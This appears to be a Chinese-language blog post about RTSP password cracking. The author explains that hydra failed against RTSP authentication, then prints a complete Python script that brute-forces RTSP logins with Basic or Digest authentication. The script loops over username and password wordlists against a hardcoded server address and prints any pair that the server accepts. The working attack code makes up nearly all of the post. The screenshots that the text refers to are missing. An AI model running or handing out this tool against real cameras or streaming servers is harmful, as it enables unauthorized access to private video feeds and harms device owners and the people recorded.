一、说明
hydra是说已实现了rtsp的爆力破解,但是使用时发现字典中明明已包含正确的用户名密码hydra却还没检测出来;
拦截数据包查看,感觉hydra只是尝试去匿名访问,并没有发送用户名密码去验证,所以自己写了个脚本。
二、脚本代码
rtsp有Basic和Digest两种验证方式,这里默认使用‘Basic’,如果想用‘Digest’方式将代码中的config_dict['brute_force_method']修改为‘Digest’
注意得自己在脚本的同目录下,放好“username.txt”(一行为一个用户名的形式)和"password.txt"(一行为一个密码的形式)两个字典文件
import socket import hashlib import base64 #define variables we need global config_dict config_dict = { "server_ip": "10.10.6.94", "server_port": 554, "server_path": "/chID=8&streamType=main", "user_agent": "RTSP Client", "buffer_len": 1024, "username_file": "username.txt", "password_file": "password.txt", "brute_force_method": 'Basic' } def gen_base_method_header(auth_64): global config_dict #build the prefix of msg to send str_base_method_header = 'DESCRIBE rtsp://'+config_dict["server_ip"]+':'+str(config_dict["server_port"])+config_dict["server_path"] + ' RTSP/1.0 ' str_base_method_header += 'CSeq: 4 ' str_base_method_header += 'User-Agent: '+config_dict["user_agent"]+' ' str_base_method_header += 'Accept: application/sdp ' str_base_method_header += 'Authorization: Basic '+auth_64 + ' ' str_base_method_header += ' ' return str_base_method_header def base_method_brute_force(socket_send,username,password): global config_dict # use base64 to encode username and password auth_64 = base64.b64encode((username + ":" + password).encode("utf-8")).decode() # try to auth server str_base_method_header = gen_base_method_header(auth_64) socket_send.send(str_base_method_header.encode()) msg_recv = socket_send.recv(config_dict["buffer_len"]).decode() # if the server response '200 OK' It means the username and password pair is right if '200 OK' in msg_recv: print("found key -- " + username + ":" + password) def gen_digest_describe_header(): global config_dict str_digest_describe_header = 'DESCRIBE rtsp://'+config_dict["server_ip"]+':'+str(config_dict["server_port"])+config_dict["server_path"] + ' RTSP/1.0 ' str_digest_describe_header += 'CSeq: 4 ' str_digest_describe_header += 'User-Agent: '+config_dict["user_agent"]+' ' str_digest_describe_header += 'Accept: application/sdp ' str_digest_describe_header += ' ' return str_digest_describe_header def gen_response_value(url,username,password,realm,nonce): global config_dict frist_pre_md5_value = hashlib.md5((username + ':' + realm + ':' + password).encode()).hexdigest() first_post_md5_value = hashlib.md5(('DESCRIBE:' + url).encode()).hexdigest() response_value = hashlib.md5((frist_pre_md5_value + ':' + nonce + ':' + first_post_md5_value).encode()).hexdigest() return response_value def gen_digest_describe_auth_header(username,password,realm_value,nonce_value): global config_dict url = 'rtsp://' + config_dict['server_ip'] + ':' + str(config_dict['server_port']) + config_dict['server_path'] response_value = gen_response_value(url, username, password,realm_value, nonce_value) str_describe_auth_header = 'DESCRIBE rtsp://' + config_dict['server_ip'] + ':' + str(config_dict['server_port']) + config_dict['server_path'] + ' RTSP/1.0 ' str_describe_auth_header += 'CSeq: 5 ' str_describe_auth_header += 'Authorization: Digest username="' + username + '", realm="' + realm_value + '", nonce="' + nonce_value + '", uri="' + url + '", response="' + response_value + '" ' str_describe_auth_header += 'User-Agent: ' + config_dict['user_agent'] + ' ' str_describe_auth_header += 'Accept: application/sdp ' str_describe_auth_header += ' ' return str_describe_auth_header def digest_method_brute_force(socket_send,username,password,realm_value,nonce_value): global config_dict str_digest_describe_auth_header = gen_digest_describe_auth_header(username,password,realm_value,nonce_value) socket_send.send(str_digest_describe_auth_header.encode()) msg_recv = socket_send.recv(config_dict['buffer_len']).decode() if '200 OK' in msg_recv: print("found key -- " + username + ":" + password) #create socket to server socket_send = socket.socket(socket.AF_INET,socket.SOCK_STREAM) socket_send.connect((config_dict["server_ip"],config_dict["server_port"])) #decide use what method to brute force if config_dict['brute_force_method'] == 'Basic': print('now use basic method to brute force') with open(config_dict["username_file"],"r") as usernames: for username in usernames: username = username.strip(" ") with open(config_dict["password_file"],"r") as passwords: for password in passwords: password = password.strip(" ") base_method_brute_force(socket_send, username, password) else: print('now use digest method to brute force') with open(config_dict["username_file"], "r") as usernames: for username in usernames: username = username.strip(" ") with open(config_dict["password_file"], "r") as passwords: for password in passwords: password = password.strip(" ") str_digest_describe_header = gen_digest_describe_header() socket_send.send(str_digest_describe_header.encode()) msg_recv = socket_send.recv(config_dict['buffer_len']).decode() realm_pos = msg_recv.find('realm') realm_value_begin_pos = msg_recv.find('"',realm_pos)+1 realm_value_end_pos = msg_recv.find('"',realm_pos+8) realm_value = msg_recv[realm_value_begin_pos:realm_value_end_pos] nonce_pos = msg_recv.find('nonce') nonce_value_begin_pos = msg_recv.find('"',nonce_pos)+1 nonce_value_end_pos = msg_recv.find('"',nonce_pos+8) nonce_value = msg_recv[nonce_value_begin_pos:nonce_value_end_pos] digest_method_brute_force(socket_send, username, password,realm_value,nonce_value) socket_send.close()
使用Basic方式,运行结果如下:
使用nonce方式,运行结果如下:
参考:
https://www.cnblogs.com/lidabo/p/6472982.html
https://www.cnblogs.com/MikeZhang/archive/2012/10/29/rtspTcpClient_DSS_20121029.html